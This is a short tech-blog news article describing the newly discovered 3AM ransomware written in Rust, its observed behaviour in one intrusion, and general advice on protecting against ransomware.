Until recently, the prevailing view assumed

New Ransomware Strain 3AM Surfaces, Posing Significant Threat to Businesses

New Ransomware Strain 3AM Surfaces, Posing Significant Threat to Businesses

In a recent development, a novel ransomware strain named "3AM" has surfaced, catching the attention of cybersecurity experts. A division of Broadcom uncovered this new malware during an incident investigation. Unlike previously known ransomware families, 3AM is written in Rust language, signifying its novelty in the threat landscape, making it more difficult for the researchers to decrypt the files.

According to the findings, this latest cyber attack demonstrates distinctive behavior patterns. It initiates its attack by halting multiple services on the compromised system before commencing the file encryption process. Once the encryption is completed, the ransomware attempts to erase Volume Shadow (VSS) copies, making data recovery more challenging for victims.

The malware earns its name from being referenced within the ransom note and appends the encrypted files with the "threeamtime" extension. Notably, it remains unclear whether the creators of this ransomware have ties to established cybercriminal groups.

In a documented attack observed by the team, the threat actor deployed 3AM on three machines within the target organization's network. However, security measures successfully blocked the ransomware on two of these machines.

What makes this intrusion noteworthy is the cybercriminal's use of Cobalt Strike for post-exploitation activities and privilege escalation. Following this, survey commands were executed to identify other servers for lateral movement. The specific entry point employed in the attack remains undisclosed.

Moreover, the attackers added a new user account for persistence and employed the Wput tool to exfiltrate victim files to their own FTP server.

3AM, a 64-bit executable written in Rust, systematically disables various security and backup-related software, selectively encrypts files based on predefined criteria, and purges volume shadow copies. Although the exact origins of this ransomware are unknown, evidence suggests that the affiliate involved in the attack may have targeted other entities, as indicated by a Reddit post from September 9, 2023.

The Principal Intelligence Analyst at the research team also emphasized the potential threat posed by 3AM, especially considering its use as a fallback by a LockBit affiliate. This underscores the evolving landscape of ransomware attacks, where affiliates demonstrate increasing independence from operators.

While many new ransomware families emerge and fade quickly, the fact that 3AM is considered a credible threat by experienced cybercriminals raises concerns about its potential resurgence in future attacks. The cybersecurity community will continue to monitor and analyze this evolving threat landscape.

Essential Tips for Protecting Yourself from the 3AM Ransomware Threat

To shield yourself from the 3AM ransomware threat, it's essential to take proactive steps. Start by educating yourself and your team about ransomware attacks, familiarizing them with common tactics and how to spot phishing emails and other malicious content. Additionally, keeping your software up to date is crucial, as updates often contain security patches that can thwart known ransomware vulnerabilities. Employ a robust security solution capable of detecting and preventing ransomware attacks to fortify your system's defenses. Lastly, regularly back up your data to ensure you have a secure copy, even in the event of a ransomware compromise. These precautions can help safeguard against the evolving threat landscape posed by ransomware like 3AM.

Like 0

"Priil Tech Nerds" - consists of skilled writers and editors dedicated to producing exceptional content. Our articles are crafted by a team of passionate writers and researchers who are committed to sharing valuable ideas you can rely on.
avatar

Author

– Priil Tech Nerds

Leave a Reply     

You may also like

footer-seperator

© Priil Ltd. All Rights Reserved

Priil trademarks or registered trademarks are property of Priil Ltd. or Priil US LLC. Firefox is a trademark of Mozilla Foundation. Android, Google Chrome, Google Play, and the Google Play logo are trademarks of Google, LLC. Mac, iPhone, iPad, Apple, and the Apple logo are trademarks of Apple Inc., registered in the U.S. and other countries. App Store is a service mark of Apple Inc. Microsoft and the Windows logo are trademarks of Microsoft Corporation in the U.S. and other countries. The Android robot is reproduced or modified from work created and shared by Google and used according to terms described in the Creative Commons 3.0 Attribution License. Other names may be trademarks of their respective owners.